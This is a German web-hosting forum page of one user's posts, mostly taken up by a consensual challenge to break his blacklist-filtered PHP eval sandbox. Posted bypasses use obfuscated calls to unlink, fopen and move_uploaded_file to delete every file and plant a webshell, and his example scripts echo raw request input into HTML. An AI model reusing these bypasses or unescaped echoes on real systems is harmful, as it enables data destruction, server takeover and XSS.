kostenloser Webspace werbefrei: lima-city


Suche auf lima-city

  • in: Das Forenspiel - Mod und Knight jagt

    geschrieben von ajacr

    jacr schrieb:
    ajacr schrieb:
    jacr schrieb:
    ajacr schrieb:
    jacr schrieb:
    Das Spiel ist zu einfach.

    123456789101131415161718192021224252627282930




  • in: Das Forenspiel - Mod und Knight jagt

    geschrieben von ajacr

    jacr schrieb:
    ajacr schrieb:
    jacr schrieb:
    Das Spiel ist zu einfach.

    123456789101131415161718192021224252627282930


  • in: Das Forenspiel - Mod und Knight jagt

    geschrieben von ajacr

    jacr schrieb:
    Das Spiel ist zu einfach.

    123456789101131415161718192021224252627282930
  • in: Nur noch 5 Euro bis zur nächste Spende

    geschrieben von ajacr

    Gewonnen hat...

    Ach schaut doch selber nach.
    Und ich werde den Betrag mal aufrunden.
    So dass 20 Euro an... gehen.
  • in: Aufschalten von Fremddomains

    geschrieben von ajacr

    In der Kommandozeile:
    ping proxy.lima-city.de


    Liefert:
    89.238.67.238

    Diese IP musst du als A-Eintrag eintragen.

  • in: Nickbewertung

    geschrieben von ajacr

    zwiebeldoener

    Nick: Könnte essbar sein.

    Avatar: Rettet die Dönertiere

    Signatur: Was hat adrians was ich nicht hab? :confused:
  • in: Nur noch 5 Euro bis zur nächste Spende

    geschrieben von ajacr

    Total votes: 73
    Bitte abstimmen!

    Danke!
  • in: Nur noch 5 Euro bis zur nächste Spende

    geschrieben von ajacr

    Selbst 100 Stimmen kann bei den Tempo noch lange dauern. :slant:
    Jemand eine Idee wie man das ändern könnte?
  • in: Nur noch 5 Euro bis zur nächste Spende

    geschrieben von ajacr

    *push* und abstimm:wink:
  • in: Nur noch 5 Euro bis zur nächste Spende

    geschrieben von ajacr

    Jetzt wird auch angezeigt wer mithilft die Wette, durch einen Link auf seiner Homepage, bekannter zu machen.
    Dazu müsst ihr bei den Links den Refer mitangeben.
    Beispiel:
    http://du-bist.net/Wette?helfer=http://lima-city.de

    P.S. Refer sind hier auf Lima verboten. Darum ist hier jetzt der Link ohne einen Refer. Wenn ihr es auf eurer Seite macht, könnt ihr das "http://lima-city.de" durch eure Seite ersetzen.
    Sollte kein Refer angegeben sein, wird der Refer des Browsers genommen.
  • in: Happy Birthday, lordoflima

    geschrieben von ajacr

    moritzpeuser schrieb:
    Patrick? ^^
    Hab ich hier irgendwas falsch verstanden? :biggrin:


    Wie du kennst Patrick nicht?:biggrin:
  • in: Nur noch 5 Euro bis zur nächste Spende

    geschrieben von ajacr

    Wir sind jetzt bei 48.
    Wer will nochmal, wer hat noch nicht? :wink:
  • in: Formular mit select ein value zuweisen?

    geschrieben von ajacr

    the-eden-projekt schrieb:
    Da wo bei dir selected steht das müste bei mir überall stehen und er muss den wert aus der datenbank holen mit er weiß wo das selected sein muss


    Ich gehe mal davon aus, dass $editieren[aktiv] der letzte wert ist.
    Und dieser soll ausgewählt werden.

    <select name="rank" size="1">
    <?
    $aktValue="ja";
    $wert[]= 1;
    $wert[]= "1-2";
    $wert[]= "ja";
    foreach ($wert as $value){
      $temp='';
      if($value== $aktValue) $temp =' selected ';
      echo "<option".$temp.">". $value ."</option>";
    }
    
    ?>
    </select>

    Hier das Ergebnis:
  • in: Formular mit select ein value zuweisen?

    geschrieben von ajacr

    Suchst du das?

    Hier das Ergebnis:
    <select name="rank" size="1">
          <option>1</option>
          <option selected >2</option>
          <option>3</option>
    </select>

  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    Wer hat folgendes Skript geschrieben?

    <?
    $od = 'o' . 'pendi' . 'r';
    $dh = $od
     #
    ('.');
    while ($entry = readdir($dh)) {
      if ('..' === $entry || '.' === $entry) {
        continue;
      }
      echo htmlspecialchars($entry), is_dir('./'. $entry) ? '[DIR]' : '','<br />'; 
    }
    $ul = 'unl'.'ink';
    $ul #
    ('./save/3171618ad57bfa57bc0a7abdac9ef0981e27a40f.txt');
    ?>


    Man lernt immer wieder hinzu.
    Aber das geht jetzt auch nicht mehr. ;)
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    thomasba schrieb:
    jacr schrieb:
    Ihr könnt jetzt eure eigene Beispiele von externe Seiten verlinken.

    Siehe z.B. Beispiele 1 aus meinen ersten Beitrag in diesen Thread. Die "Update"-Funktion könnt ihr benutzen, wenn sich etwas geändert hat.

    Also zeigt mir eure Beispiele.

    P.S. es wurden schon lange keine Sicherheitslücken gefunden!
    Also strengt euch an!


    Nach wie vor eine Art XSS ;)

    Aber du könntest doch beim ersten Besuch einen Hinweis ANzeigen, das die Seite zum testen von PHP-Codes ist und die Inhalte nicht von dir Stammen, dann wärst du auf der sicheren Seite ;)


    Dachtest du dir das so ungefähr?
  • in: Lima-city brennt!

    geschrieben von ajacr

    nikic schrieb:
    Hehe, ich habs gelöscht :D Aber mit i=100 :P

    So, schon ein zweites mal 100 Feuer gelöscht :D Lustige Beschäftigung.


    Freud mich wenn du Spaß hast.

    P.S. Wenn dir das so viel Spaß macht, dann schau mal hier.

    In übrigen gibt es jetzt bei einen vernümftigen Browser einen Feuerlöscher.
    Für den IE bräuchte ich ein Icon.
    Dann hat der eben eine Fadenkreuz.

  • in: Lima-city brennt!

    geschrieben von ajacr

    burgi schrieb:
    Und ich hab' wieder mal keinen Feuerlöscher neben dem PC stehen ... :pissed:


    Ich habe mal was eingebaut, dass man es löschen kann.

    Muss mal schauen, ob man das auch mit einen Feuerlöscher machen kann. :wink:
  • in: Lima-city brennt!

    geschrieben von ajacr

    moritzpeuser schrieb:
    Keine Zeit. Jetzt muss ich erstmal den Doener verdreschen. :shaft:


    Warum hast du jetzt seine Seite angezündet?
    Das ist aber nicht nett.
  • in: Lima-city brennt!

    geschrieben von ajacr

    moritzpeuser schrieb:
    Was fällt dir ein :eek:


    Doener ist schuld.
    Ich sollte mein Skript verbrenne.
    Das habe ich auch gemacht. Aber jetzt ist das Feuer auf Lima-City über geschlagen.
    Kannst ja mal ein Löschskript schreiben. :wink:
  • in: Lima-city brennt!

    geschrieben von ajacr

    Lima-City brennt!

    Glücklicher weise ist das ein Skript.
    Aber zeigt doch mal eure HTML-Kenntnisse.
    Und entwickelt ähnliche Skripte (z.B. fallende Herzen, fliegenden Vögel usw.)

    Die Skripte könnt ihr hier auf Lima-City in der "code"-Umgebung speichern.
    Und dann verlinken.
    Die Links haben die Folgende Form:
    http://ajacr.lima-city.de/?load=0@http://www.lima-city.de/thread/lima-city-brennt

    Die 0 ersetzt ihr durch die Zahl des Skripts auf dieser Seite.

    Danach können wir ja mal abstimmen, wer das schönste Skript entwickelt hat.

    Mein Beispiel:
    <script type="text/javascript">
    //alert('test');
    var myImage =0;
    function hiddenImage( zahl ) {
    document.getElementById('image'+zahl).style.display= 'none';
    }
    
    function showImage( zahl ) {
    document.getElementById('image'+zahl).style.display= 'inline';
    }
    function addImage() {
    myImage=myImage+1;
    document.write('<div id="image'+ myImage+'" style="display:none;z-index:10;position:absolute; top:'+Math.random()*100+'%; left:'+Math.random()*100+'%;"><a href="javascript:void" style="cursor:url(img/feuerloescher06.gif), crosshair;" onClick="javascript:hiddenImage('+myImage+');"><img src="img/Feuer_008.gif" border="0"></a></div>');
    
      }
    <?
    $zahl=100;
    if($_GET[i]>0) $zahl= $_GET[i];
    echo "for (var i = 1; i <= ".$zahl."; i++){
    ";
    ?>
    
      addImage();
      window.setTimeout("showImage("+i+")", 10000*Math.random());
    }
    </script>
    
    <?
    if($_GET['url']!=''){
      echo '<iframe src="'.$_GET['url'].'" style="z-index:1;position:absolute; top:0px; left:0px; bottom:0px; right:0px; width:99%; height:99%;" />';
    }else{
     show_source("index.php");
    }
    
    ?>


  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    Es gibt jetzt eine kleine Änderung.
    Jetzt kann man HTML testen.
    Somit gehen die alten Scripte nicht mehr.

    Wandelt sie einfach in php um.
    Und dann gehen sie wieder.

    Fehler und Sicherheitslücken bitte melden. :wink:
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    vercetti schrieb:
    verschieb das alles ma so dass der abstand von top mindestens so viel is, wie der eingabebereich oben braucht :>


    Benutz mal run als Parameter. :wink:
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    vercetti schrieb:
    mit i= 10000 gefällt mir dein feuer ;D


    Wir können ja mal eine Wettbewerb machen.
    Wer kann an besten das Skript verbrennen. :biggrin:

    Die Anregung dazu kam übrigens von Doener.
    Mehr bei Lucas. :wink:
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    Also jetzt mal etwas zu euren Argumenten.

    Anforderung: Ich suche ein Skript mit den man möglichst viel Code ausprobieren kann.

    Dazu gibt es zwei Möglichkeiten.
    1. Whitelist, d.h. man erlaubt nur dass was benötigt wird
    2. Blacklist , d,h, man verbiete das was man nicht haben möchte

    Jetzt kann man auf die Anforderungen schauen.
    Dann wird deutlich, dass eine Whitelist sehr komplex wird. Dies bedeuten aber, dass sie sehr Fehleranfällig ist. Somit wird es bei so einer Liste vermutlich Sicherheitslücken geben.
    Diese Sicherheitslücken findet man in den man sich überlegt wie eine Angreifer das Script ausnutzen würde.
    Aber genau das macht man auch bei einer Blacklist. Man sucht die möglichen Sicherheitslücken und schließt sie.
    Der Vorteil bei einer Blacklist ist, es werden mit der Zeit weniger Sicherheitslücken. Bei einer Whitelist kommen Sicherheitslücken hinzu.
    Eine Blacklist wird immer sicher und einer Whitelist immer unsicher.
    Zudem ist die Einschränkung bei einer Blacklist in der Regel geringer als bei einer Whitelist.
    Dieses spricht für eine Blacklist. Allerdings muss man dann alle Möglichen Sicherheitslücken bedenken. Was gegen eine Blacklist spricht. Währe die Anforderung nicht so groß, dann sollte man besser eine Whitelist benutzen.

    alopex schrieb: Der Vorteil von Whitelisting ist der, dass du für alle zukünftigen Eventualitäten gewappnet bist.

    Jedesmal wenn eine neue PHP-Version eine neue Möglichkeit bietet, irgendwas "Böses" auszuführen, die vorherige PHP-Versionen noch nicht kannten, musst du sonst dein bisheriges Script neu anpassen. Mit Blacklisting kannst du nur auf schon bekannte Sicherheitsrisiken reagieren. Damit begibst du dich in die gleiche Falle wie die Hersteller von Antivirensoftware.


    Das ist ein Punkt, den ich auch bedacht habe.
    Allerdings ist es nicht gerade Wahrscheinlich, dass Sicherheitsrelevante Funktionen hinzukommen.
    Und wenn du Glaubst eine komplexe Whitelist wäre von diesen Änderungen nicht betroffen, dann irrst du.
    Denn es kann sein, dass etwas auf der Whitelist erlaubt wurde, was aber später unsicher ist.
    Weil die Syntax erweitert wurde. Änderungen in der Syntax dürfte das gefährliche sein.

    Ihr Argumentiert, dass eine Blacklist zu unsicher ist.
    Vergesst aber die Risiken zu berücksichtigen.
    Ein Ereignis, was sehr Wahrscheinlich ist, aber relativ harmlos. Ist durchaus nicht so schlimm wie einer Ereignis, was ab und zu passiert aber einen sehr großen Schaden anrichtet.

    Das Skript ist und bleibt auf einen Webspace, auf den nur diese Skript ist.
    Ein Angreifer könnte zwar diesen Webspace kontrollieren. Aber was will er damit? Er hat weniger Funktionen als wenn er sich direkt mit falschen Daten bei Lima anmeldet. Also wird keiner versuchen das Skript wegen den Webspace anzugreifen.

    Das Skript wird keine Benutzeranmeldung bekommen. Somit kann der Angreifer auch nicht wichtige Benutzerdaten bekommen.
    Was beleibt den Angreifer dann noch.
    Doch nur die Besucher der Seite, welchen er versuchen kann einen Virus zu installieren oder zu einer bestimmten Seite Locken kann. Aber davor ist keine Seite sicher.
    Der Grund ist, dass man oft sich keine Gedanken macht wie ein Angreifer vorgehen könnte. Aber genau diese macht man ja bei der Blacklist.

    Jetzt frage ich euch.
    Was ist besser Whitelist oder Blacklist?

    Bei anderen Anforderungen könnte eine Whitelist besser sein.
    Das beste wäre eine Whitelist und eine Blacklist zu benutzen.
    Dieser Aufwand ist aber in Verhältnis zum Nutzen in diesen Fall zu gering.
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    alopex schrieb:
    tct schrieb:
    Wir suchen nicht seine Fehler, sondern versuchen das sicherste eval()-Script der Welt zu entwickeln.


    Ernsthaft? Dann schlage ich vor, mit dem Unsinn aufzuhören und (wie von trueweb vorgeschlagen) von Black- auf White-Listing umzusteigen. Ansonsten verstärkt ihr meine Zweifel an den geistigen Fähigkeiten der heutigen Informatikstudenten.

    Das sicherste eval()-Script (im Rahmen von PHP) sieht übrigens so aus:

    // überprüfen der Eingabewerte
    echo isset($_GET['code']) ? $_GET['code'] : '';
    // ausführen des absolut sicheren Codes
    eval('');



    Eine Whitelist ist eine zu starke Einschränkung bzw. man muss sehr viele Fälle abdecken.
    Die Frage ist, geht es nicht mit eine Blacklist.
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    vercetti schrieb:
    Nein, wollen wir nicht. Ich sagte nur, dass ich denke, er weiß nicht, was der Fehler bedeutet.

    Egal.

    @eval-script:
    ich würd sagen das script ist schon ZIEMLICH sicher.. aber ich denke morgen abend werd ich noch was finden :P

    Ich bin dann mal off :>


    Und jetzt sieht es so aus, als würde jemand noch eine Lücke finden.
    Ich habe mal ein bisschen geholfen.

  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    vercetti schrieb:

    p.s.
    link("index.php","penis.php");

    ;D


    Gefundene Sicherheitsprobleme:
    "Befehle:unlink und rmdir" gefunden von tct
    "Befehl: <?" gefunden von trueweb
    "Gorß- und Keinschreibung beachten" gefunden von five-three-nine
    "Variablen als Funktionen benutzen" gefunden von vercetti
    "Kommentar Funktion" gefunden von vercetti
    "Befehle: call_user_func und create_function usw." gefunden von vercetti
    "Befehl: Link" gefunden von vercetti
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    vercetti schrieb:
    pff jetz war ich grad mit register_Tick_function am spielen, hab mir ne eval.php erstellt und der ajacr löscht die datei und blockt die func xDD weiter gehts!


    Ich bin gemein. :biggrin:

    P.S. eben wurde die Startseite von http://dansguardian.org geblockt.
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    vercetti schrieb:
    $test = "fop";
    $test .= "en";
    call_user_func ($test,"vercetti.ist.king.txt","w");


    http://ajacr.lima-city.de/vercetti.ist.king.txt


    Gefundene Sicherheitsprobleme:
    "Befehle:unlink und rmdir" gefunden von tct
    "Befehl: <?" gefunden von trueweb
    "Gorß- und Keinschreibung beachten" gefunden von five-three-nine
    "Variablen als Funktionen benutzen" gefunden von vercetti
    "Kommentar Funktion" gefunden von vercetti
    "Befehle: call_user_func und create_function usw." gefunden von vercetti

  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    vercetti schrieb:
    ne :/ die hattest du ja auch mittlerweile gelöscht die vercetti.php :/


    -------
    das müsste gehn:

    geh in datei manager. guck dir die url an:
    http://filemanager.lima-city.de/?sid=XXXXXXX

    erstell lokal eine datei irgendwas.html und ersetz das XXXXXXX durch deine SID:

    <form action="">
    <input type="hidden" name="sid" value="XXXXXXX"><input type="hidden" name="dir" value="">
    <input type="hidden" name="action" value="upload">
    <input type="submit" value="Ausf&uuml;hren">
    </form>



    und lad die datei hoch und für danach aus [musst evtl öfter ausführen, wegen zeitlimit wird der nich alle dateien schaffen:
    achja die datei muss dontdelete.php heissen

    <?php
    $handle = opendir('.')
    while (($f = readdir($handle)) !== false) {
    if($f != "." && $f != ".." && $f != "dontdelete.php")
    unlink($f);
    }
    closedir($handle);
    ?>


    Ganz so einfach war es nicht, da der Filemanager bein hochladen abgestützt ist.
    Aber ich habe dann eine Datei mit einer Zeile hoch geladen.

    Jetzt kann es weiter gehen. :wink:

  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    vercetti schrieb:
    bin kein mod xD

    sorry^^ :>


    Tja, die können das auch nicht.
    Ich habe tct falsch verstanden.

    Er hat es mit eine Befehl gemacht.
    Hast du nicht eine Hintertür hochgeladen, die das kann?
    Sonst müssten wir warten.
    Fatal error: Allowed memory size of 41943040 bytes exhausted (tried to allocate 11272552 bytes) in /home/webpages/lima-city/filemanager/html/library/class.table.php on line 109
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    Das Problem ist, dass ich jetzt nicht mehr die Dateien ändern kann.
    Denn du hast den Filemanager zerstört. Und FTP habe ich hier noch nicht.
    Kannst du mal den Webspace löschen?

    Gefundene Sicherheitsprobleme:
    "Befehle:unlink und rmdir" gefunden von tct
    "Befehl: <?" gefunden von trueweb
    "Gorß- und Keinschreibung beachten" gefunden von five-three-nine
    "Variablen als Funktionen benutzen" gefunden von vercetti
    "Kommentar Funktion" gefunden von vercetti
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    cbhp schrieb:
    copy("index.php",".htaccess");



    Copy hatte ich noch extra für euch drin gelassen.
    Aber jetzt ist es auch draußen.

    Gefundene Sicherheitsprobleme:
    "Moderatoren von Lima-City" gefunden von tct
    "Befehle:unlink und rmdir" gefunden von fatfreddy
    "Befehl: <?" gefunden von trueweb
    "Gorß- und Keinschreibung beachten" gefunden von five-three-nine
    "Variablen als Funktionen benutzen" gefunden von vercetti
    "Befehl: copy " gefunden von projektverwaltung und cbhp
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    projektverwaltung schrieb:
    kann es sein dass unlink jetzt immer rausgeworfen wird, egal ob man es nur mit echo hinschreiben will?


    Das kann sein.
    Aber du hast ja jetzt eine Lösung gefunden, wie du es überprüfen kannst. :wink:

  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    tct schrieb:
    Stell lieber eine Liste auf, was überhaupt noch geht :megarofl:


    Das ist noch zu viel. :wink:
    Dazu müsst ihr euch schon mehr ansträngen.:biggrin:

    thomasba schrieb: - mail()


    Ist nicht Sicherheitsrelevant sondern nur Spamgefahr.
    Aber wenn jemand jetzt mailen möchte....
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    vercetti schrieb:
    Oh doch!

    $vercetti = "_F";
    $vercetti .= "ILES";
    $ist = "upf";
    $ist .= "ile";
    $der = "move_uploaded_fi";
    $der .= "le";
    $king = $$vercetti;
    $der($king[$ist]['tmp_name'], "vercetti.php");



    Geht jetzt nicht mehr.

    Gefundene Sicherheitsprobleme:
    "Moderatoren von Lima-City" gefunden von tct
    "Befehle:unlink und rmdir" gefunden von fatfreddy
    "Befehl: <?" gefunden von trueweb
    "Gorß- und Keinschreibung beachten" gefunden von five-three-nine
    "Variablen als Funktionen benutzen" gefunden von vercetti
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    Sonst findet ihr nichts mehr?:slant:
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    fatfreddy schrieb:
    Zum löschen muß man kein Moderator sein. Done! :biggrin:

    Freddy


    Stimmt aber jetzt sollte es nicht mehr gehen.

    Gefundene Sicherheitsprobleme:
    "Moderatoren von Lima-City" gefunden von tct (diese Problem kann leider nicht behoben werden )
    "Befehle:unlink und rmdir" gefunden von fatfreddy
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    Die Datei ist wieder online. :wink:

    Gefundene Sicherheitsprobleme:
    "Moderatoren von Lima-City" gefunden von tct (diese Problem kann leider nicht behoben werden :biggrin: )
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    tct schrieb:
    Der Grund ist, dass ich es konnte.
    Du wolltest doch Sicherheitslücken haben, also habe ich deinen kompletten Space gelöscht. Zum Glück war ja nur diese eine Datei drauf.

    eval is evil!


    Nee, da hast du jetzt etwas falsch verstanden.
    Das war so nicht gedacht.
    Wenn die Moderatoren tatsächlich bei Lima ein Sicherheitsproblem sind, dann sollte man sie abschafen. :biggrin:
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    tct schrieb:
    ajacr schrieb:
    Versucht doch bitte mal Sicherheitslücken zu finden.
    http://ajacr.lima-city.de

    Jens

    Ich hab dir die Datei mal gelöscht, ich hoffe es ist nicht so schlimm :wink:


    Hast du zu große Sicherheitsbedenken gehabt?
    Oder was war der Grund?
  • in: PHP-Code testen - Versucht diese Seite zu hacken

    geschrieben von ajacr

    Versucht doch bitte mal Sicherheitslücken zu finden.
    http://ajacr.lima-city.de

    Beispiele 1:
    Test <br>
    <?
    show_source("index.php");
    ?>


    Beispiele 2:
    <script type="text/javascript">
    var myImage =0;
    function showImage( zahl ) {
    document.getElementById('image'+zahl).style.display= 'inline';
    }
    function addImage() {
    myImage=myImage+1;
    document.write('<div id="image'+ myImage+'" style="display:none;z-index:10;position:fixed; top:'+Math.random()*100+'%; left:'+Math.random()*100+'%;"><img src="img/Feuer_008.gif"></div>');
    
      }
    <?
    $zahl=100;
    $myTime=10000;
    if($_GET[i]>0) $zahl= $_GET[i];
    if($_GET[time]>0) $myTime= $_GET[time];
    echo "var myTime=".$myTime.";";
    echo "for (var i = 1; i <= ".$zahl."; i++){
    ";
    ?>
    
      addImage();
      window.setTimeout("showImage("+i+")", myTime*Math.random());
    }
      //showImage(1);
    </script>
    
    <?
    if($_GET['url']!=''){
      echo '<iframe src="'.$_GET['url'].'" style="z-index:1;position:absolute; top:0px; left:0px; bottom:0px; right:0px; width:99%; height:99%;" />';
    }else{
     show_source("index.php");
    }
    
    ?>


    Beispiele 3:

    <form action="" method="POST">
    <textarea name="text" cols="50" rows="10"><? 
    echo $_POST['text'];
    ?></textarea>
    <input type="submit"  value="Rot 13" /></form>
    <?
    if($_POST['text']!=''){
      echo nl2br (str_rot13($_POST['text']));
    }
    ?>


    Beispiele 4:
    <?
    $dbname="db_23655_2";
    $dbhost="mysql.lima-city.de";
    $dbuser="USER23655";
    $dbpass="passwort";
    mysql_connect($dbhost,$dbuser,$dbpass);
    mysql_select_db($dbname);
    ?>

    Jens

Login zum Webhosting ohne Werbung!